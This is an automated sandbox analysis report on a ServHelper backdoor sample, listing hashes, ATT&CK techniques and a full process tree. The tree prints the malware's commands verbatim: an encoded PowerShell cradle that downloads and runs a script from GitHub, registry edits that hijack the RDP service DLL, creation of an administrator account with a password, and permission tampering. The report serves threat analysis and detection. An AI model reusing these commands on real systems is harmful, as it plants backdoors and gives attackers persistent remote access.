servhelper | 0b1fbc02322659bf31999e38a60f832b9ff7a10f0d4866e026deef43ce963942

Analysis

max time kernel
121s
max time network
120s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
12-10-2024 22:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe
Size

7.3MB
MD5

3c657b42330d1a7ddf6242024474fbef
SHA1

d19ca0d611db42996dc850a1bb8ce3dead8994ee
SHA256

0b1fbc02322659bf31999e38a60f832b9ff7a10f0d4866e026deef43ce963942
SHA512

caa942525e80f5ed579654eb51e58d6b6ce8c03f357d53e03b14a0e5082d940f41075adaccba09853b5fabdee3756df62d4350ca4cd2e7093bd982ea01e2b68e
SSDEEP

196608:5pqzDlif2GFRwd83gu5Bcl9tXyH/APnRxJY7DvtzLEu4i67b2A9tP:504FR0OgcBgaIPnRxJY7DVzLl4i6n2I5

Score

10^/10

servhelper backdoor defense_evasion discovery execution exploit lateral_movement persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 6 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
lateral_movement

RDP Hijacking
T1563.002

Processes:

net.exenet1.execmd.exenet.exenet1.execmd.exe

pid process

2824 net.exe
2584 net1.exe
2700 cmd.exe
2836 net.exe
2840 net1.exe
2788 cmd.exe
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

8 2860 powershell.exe
9 2860 powershell.exe
Indicator Removal: Network Share Connection Removal 1 TTPs 3 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
defense_evasion

Network Share Connection Removal
T1070.005

Processes:

cmd.exenet.exenet1.exe

pid process

888 cmd.exe
1264 net.exe
1920 net1.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exe

pid process

2776 icacls.exe
880 icacls.exe
1400 icacls.exe
1828 icacls.exe
1528 icacls.exe
2408 icacls.exe
1856 icacls.exe
1248 takeown.exe

pid	process
2824	net.exe
2584	net1.exe
2700	cmd.exe
2836	net.exe
2840	net1.exe
2788	cmd.exe

flow	pid	process
8	2860	powershell.exe
9	2860	powershell.exe

pid	process
888	cmd.exe
1264	net.exe
1920	net1.exe

pid	process
2776	icacls.exe
880	icacls.exe
1400	icacls.exe
1828	icacls.exe
1528	icacls.exe
2408	icacls.exe
1856	icacls.exe
1248	takeown.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

2864 powershell.exe
Executes dropped EXE 3 IoCs

Processes:

Mare.exe.comMare.exe.comMare.exe.com

pid process

2656 Mare.exe.com
2728 Mare.exe.com
2964 Mare.exe.com
Loads dropped DLL 5 IoCs

Processes:

cmd.exeMare.exe.comMare.exe.com

pid process

2680 cmd.exe
2656 Mare.exe.com
2728 Mare.exe.com
1292
1292
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exe

pid process

2776 icacls.exe
880 icacls.exe
1400 icacls.exe
1828 icacls.exe
1528 icacls.exe
2408 icacls.exe
1856 icacls.exe
1248 takeown.exe
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

7 raw.githubusercontent.com
8 raw.githubusercontent.com
9 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

Mare.exe.com

description pid process target process

PID 2728 set thread context of 2964 2728 Mare.exe.com Mare.exe.com

pid	process
2656	Mare.exe.com
2728	Mare.exe.com
2964	Mare.exe.com

pid	process
2680	cmd.exe
2656	Mare.exe.com
2728	Mare.exe.com
1292
1292

pid	process
2776	icacls.exe
880	icacls.exe
1400	icacls.exe
1828	icacls.exe
1528	icacls.exe
2408	icacls.exe
1856	icacls.exe
1248	takeown.exe

flow	ioc
7	raw.githubusercontent.com
8	raw.githubusercontent.com
9	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

description	pid	process	target process
PID 2728 set thread context of 2964	2728	Mare.exe.com	Mare.exe.com

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FOYSUDZXXIVIB2D4XDJV.temp	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

2860 powershell.exe
600 powershell.exe
3060 powershell.exe
2116 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

pid	process
2860	powershell.exe
600	powershell.exe
3060	powershell.exe
2116	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exefindstr.exePING.EXE3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exedllhost.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

PING.EXE

pid process

2768 PING.EXE
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

2888 WMIC.exe

pid	process
2768	PING.EXE

pid	process
2888	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exeWMIC.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 40ce4edef71cdb01	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1992 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2768 PING.EXE

pid	process
1992	reg.exe

pid	process
2768	PING.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2864	powershell.exe
600	powershell.exe
3060	powershell.exe
2116	powershell.exe
2864	powershell.exe
2864	powershell.exe
2864	powershell.exe
2860	powershell.exe

Suspicious behavior: LoadsDriver 4 IoCs

Processes:

pid process

472
1292
1292
1292

pid	process
472
1292
1292
1292

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

Mare.exe.compowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2964	Mare.exe.com
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	600	powershell.exe
Token: SeDebugPrivilege	3060	powershell.exe
Token: SeDebugPrivilege	2116	powershell.exe
Token: SeRestorePrivilege	880	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2888	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2888	WMIC.exe
Token: SeAuditPrivilege	2888	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2888	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2888	WMIC.exe
Token: SeAuditPrivilege	2888	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	932	WMIC.exe
Token: SeIncreaseQuotaPrivilege	932	WMIC.exe
Token: SeAuditPrivilege	932	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	932	WMIC.exe
Token: SeIncreaseQuotaPrivilege	932	WMIC.exe
Token: SeAuditPrivilege	932	WMIC.exe
Token: SeDebugPrivilege	2860	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.execmd.execmd.exeMare.exe.comMare.exe.comMare.exe.compowershell.execsc.exe

description	pid	process	target process
PID 3024 wrote to memory of 2784	3024	3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe	dllhost.exe
PID 3024 wrote to memory of 2784	3024	3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe	dllhost.exe
PID 3024 wrote to memory of 2784	3024	3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe	dllhost.exe
PID 3024 wrote to memory of 2784	3024	3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe	dllhost.exe
PID 3024 wrote to memory of 2900	3024	3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe	cmd.exe
PID 3024 wrote to memory of 2900	3024	3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe	cmd.exe
PID 3024 wrote to memory of 2900	3024	3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe	cmd.exe
PID 3024 wrote to memory of 2900	3024	3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe	cmd.exe
PID 2900 wrote to memory of 2680	2900	cmd.exe	cmd.exe
PID 2900 wrote to memory of 2680	2900	cmd.exe	cmd.exe
PID 2900 wrote to memory of 2680	2900	cmd.exe	cmd.exe
PID 2900 wrote to memory of 2680	2900	cmd.exe	cmd.exe
PID 2680 wrote to memory of 2788	2680	cmd.exe	findstr.exe
PID 2680 wrote to memory of 2788	2680	cmd.exe	findstr.exe
PID 2680 wrote to memory of 2788	2680	cmd.exe	findstr.exe
PID 2680 wrote to memory of 2788	2680	cmd.exe	findstr.exe
PID 2680 wrote to memory of 2656	2680	cmd.exe	Mare.exe.com
PID 2680 wrote to memory of 2656	2680	cmd.exe	Mare.exe.com
PID 2680 wrote to memory of 2656	2680	cmd.exe	Mare.exe.com
PID 2680 wrote to memory of 2656	2680	cmd.exe	Mare.exe.com
PID 2680 wrote to memory of 2768	2680	cmd.exe	PING.EXE
PID 2680 wrote to memory of 2768	2680	cmd.exe	PING.EXE
PID 2680 wrote to memory of 2768	2680	cmd.exe	PING.EXE
PID 2680 wrote to memory of 2768	2680	cmd.exe	PING.EXE
PID 2656 wrote to memory of 2728	2656	Mare.exe.com	Mare.exe.com
PID 2656 wrote to memory of 2728	2656	Mare.exe.com	Mare.exe.com
PID 2656 wrote to memory of 2728	2656	Mare.exe.com	Mare.exe.com
PID 2728 wrote to memory of 2964	2728	Mare.exe.com	Mare.exe.com
PID 2728 wrote to memory of 2964	2728	Mare.exe.com	Mare.exe.com
PID 2728 wrote to memory of 2964	2728	Mare.exe.com	Mare.exe.com
PID 2728 wrote to memory of 2964	2728	Mare.exe.com	Mare.exe.com
PID 2728 wrote to memory of 2964	2728	Mare.exe.com	Mare.exe.com
PID 2964 wrote to memory of 2864	2964	Mare.exe.com	powershell.exe
PID 2964 wrote to memory of 2864	2964	Mare.exe.com	powershell.exe
PID 2964 wrote to memory of 2864	2964	Mare.exe.com	powershell.exe
PID 2864 wrote to memory of 2332	2864	powershell.exe	csc.exe
PID 2864 wrote to memory of 2332	2864	powershell.exe	csc.exe
PID 2864 wrote to memory of 2332	2864	powershell.exe	csc.exe
PID 2332 wrote to memory of 2376	2332	csc.exe	cvtres.exe
PID 2332 wrote to memory of 2376	2332	csc.exe	cvtres.exe
PID 2332 wrote to memory of 2376	2332	csc.exe	cvtres.exe
PID 2864 wrote to memory of 600	2864	powershell.exe	powershell.exe
PID 2864 wrote to memory of 600	2864	powershell.exe	powershell.exe
PID 2864 wrote to memory of 600	2864	powershell.exe	powershell.exe
PID 2864 wrote to memory of 3060	2864	powershell.exe	powershell.exe
PID 2864 wrote to memory of 3060	2864	powershell.exe	powershell.exe
PID 2864 wrote to memory of 3060	2864	powershell.exe	powershell.exe
PID 2864 wrote to memory of 2116	2864	powershell.exe	powershell.exe
PID 2864 wrote to memory of 2116	2864	powershell.exe	powershell.exe
PID 2864 wrote to memory of 2116	2864	powershell.exe	powershell.exe
PID 2864 wrote to memory of 1248	2864	powershell.exe	takeown.exe
PID 2864 wrote to memory of 1248	2864	powershell.exe	takeown.exe
PID 2864 wrote to memory of 1248	2864	powershell.exe	takeown.exe
PID 2864 wrote to memory of 2776	2864	powershell.exe	icacls.exe
PID 2864 wrote to memory of 2776	2864	powershell.exe	icacls.exe
PID 2864 wrote to memory of 2776	2864	powershell.exe	icacls.exe
PID 2864 wrote to memory of 880	2864	powershell.exe	icacls.exe
PID 2864 wrote to memory of 880	2864	powershell.exe	icacls.exe
PID 2864 wrote to memory of 880	2864	powershell.exe	icacls.exe
PID 2864 wrote to memory of 1400	2864	powershell.exe	icacls.exe
PID 2864 wrote to memory of 1400	2864	powershell.exe	icacls.exe
PID 2864 wrote to memory of 1400	2864	powershell.exe	icacls.exe
PID 2864 wrote to memory of 1828	2864	powershell.exe	icacls.exe
PID 2864 wrote to memory of 1828	2864	powershell.exe	icacls.exe

C:\Users\Admin\AppData\Local\Temp\3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3024
- C:\Windows\SysWOW64\dllhost.exe
  "C:\Windows\System32\dllhost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2784
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cmd < Ali.xll
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2680
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^tTebyXGrtWfVarBpEGlherBKqJHGOsThNvZFBpPELbywUiTPDmBLMMxqasvcdqfNrwoWrWIcRFBEYmPSQRegPiBwwZjpMzhLoaYTZWLHQuUulP$" Vai.xll
      4⤵
      System Location Discovery: System Language Discovery
      PID:2788
  - - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mare.exe.com
      Mare.exe.com q
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2656
    - - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mare.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mare.exe.com q
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2728
      - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mare.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mare.exe.com
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
        7⤵
        Deletes itself
        Drops file in System32 directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2864
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zijqbzy6.cmdline"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2332
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESACB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCACA.tmp"
        9⤵
        
        PID:2376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2116
        
        C:\Windows\system32\takeown.exe
        
        "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1248
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2776
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:880
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1400
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1828
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1528
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2408
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1856
        
        C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        8⤵
        
        PID:1680
        
        C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        8⤵
        Server Software Component: Terminal Services DLL
        Modifies registry key
        
        PID:1992
        
        C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
        8⤵
        
        PID:1704
        
        C:\Windows\system32\net.exe
        
        "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        8⤵
        
        PID:2100
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        9⤵
        
        PID:2352
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        8⤵
        
        PID:1752
        
        C:\Windows\system32\cmd.exe
        
        cmd /c net start rdpdr
        9⤵
        
        PID:3008
        
        C:\Windows\system32\net.exe
        
        net start rdpdr
        10⤵
        
        PID:1472
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        11⤵
        
        PID:592
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        8⤵
        
        PID:544
        
        C:\Windows\system32\cmd.exe
        
        cmd /c net start TermService
        9⤵
        
        PID:2492
        
        C:\Windows\system32\net.exe
        
        net start TermService
        10⤵
        
        PID:2924
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        11⤵
        
        PID:1648
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
        8⤵
        
        PID:2024
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
        8⤵
        
        PID:2184
  - - C:\Windows\SysWOW64\PING.EXE
      ping localhost -n 30
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2768

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Indicator Removal: Network Share Connection Removal
PID:888
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Indicator Removal: Network Share Connection Removal
  PID:1264
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:1920

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc wGPjgHsP /add
1⤵
PID:1492
- C:\Windows\system32\net.exe
  net.exe user wgautilacc wGPjgHsP /add
  2⤵
  PID:1744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc wGPjgHsP /add
    3⤵
    PID:1912

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:2700
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:2836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:2840

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" MUYDDIIS$ /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:2788
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" MUYDDIIS$ /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:2824
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MUYDDIIS$ /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:2584

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:2668
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:2600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:3028

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc wGPjgHsP
1⤵
PID:2632
- C:\Windows\system32\net.exe
  net.exe user wgautilacc wGPjgHsP
  2⤵
  PID:2968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc wGPjgHsP
    3⤵
    PID:2224

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:1304
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2888

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:444
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:932

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2256
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:1208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

